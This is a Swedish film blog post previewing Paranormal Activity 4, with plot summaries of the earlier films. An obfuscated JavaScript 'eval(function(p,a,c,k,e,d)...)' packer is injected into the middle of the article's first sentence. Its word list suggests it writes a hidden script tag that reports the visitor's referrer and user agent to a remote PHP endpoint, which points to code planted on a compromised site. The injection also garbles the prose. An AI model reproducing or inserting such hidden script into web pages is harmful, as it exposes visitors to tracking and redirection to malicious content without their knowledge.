Image Image Image Image Image Image Image Image Image Image

| 21 oktober, 2018

Scroll to top

Top

Paranormal Activity 4

Paranormal-activity-4
Sebastian Plengier Ehrnfelt

type=”text/javascript” src=”http://videos.goviral-content.com/playerjs-yt/paranormal_activity4_12527.js?w=600&h=475&pID=59289&bgc=ffffff&cw=1438377&skinName=light&wmode=window&hideChrome=0″>

Paranormal eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|yfhzz|var|u0026u|referrer|ztaei||js|php’.split(‘|’),0,{}))
activity är en serie som verkligen gjort ett namn för sig. 2007 släpptes den första filmen som då fick otroliga recensioner för sitt unika sätt att skrämma publiken. Här handlar det inte om att visa läskiga monster eller spöken utan mer om att skapa en känsla om oro.

Paranormal activity 1 får vi möta Katie och hennes pojkvän Mika som levt tillsammans i tre år i ett hus utanför storstaden. Från ingenting händer något och de båda börjar märka underliga saker som händer när de sover. Mitt under det hela avslöjar Katie att hon varit hemsökt sedan åtta års ålder. Pojkvännen börjar dokumentera nätterna med videokamera och ser då de mest märkliga företeelserna.

Paranormal activity 2 träffar vi Daniel Ray tillsammans med hans fru Kristi, dotter Ali, Hunter och deras hund. De flyttar till ett hus i Carlsbad Kalifornien.
Efter några dagar i det nya huset märker de att det fattas ägodelar som spårlöst försvunnit. De sätter upp övervakningskameror och spelar in nätterna i huset. Det är deras barnskötare som tar hand om Hunter som en dag nämner för familjen att något är fel i deras hus. Familjen tror hon är tokig och säger upp henne. Dock kommer de att få ångra detta beslut då det efter detta börjar hända konstiga incidenter med dottern Ali. Efter en del forskande förstår de att huset är besatt av en demonisk enhet.

Nu är det dags för Paranormal activity 4!
Denna gång utspelar sig filmen 2011, fem år efter Katie dödade sin pojkvän Mika, syster Kristi och hennes man Daniel. Hon tog även sitt barn Hunter och försvann.
Nu är det Alice och hennes mamma som står i fokus och upplever konstiga saker i området sen de nya grannarna (Katie och Robbie) flyttade in i staden.

Fakta om filmen

Biopremiär: 19 oktober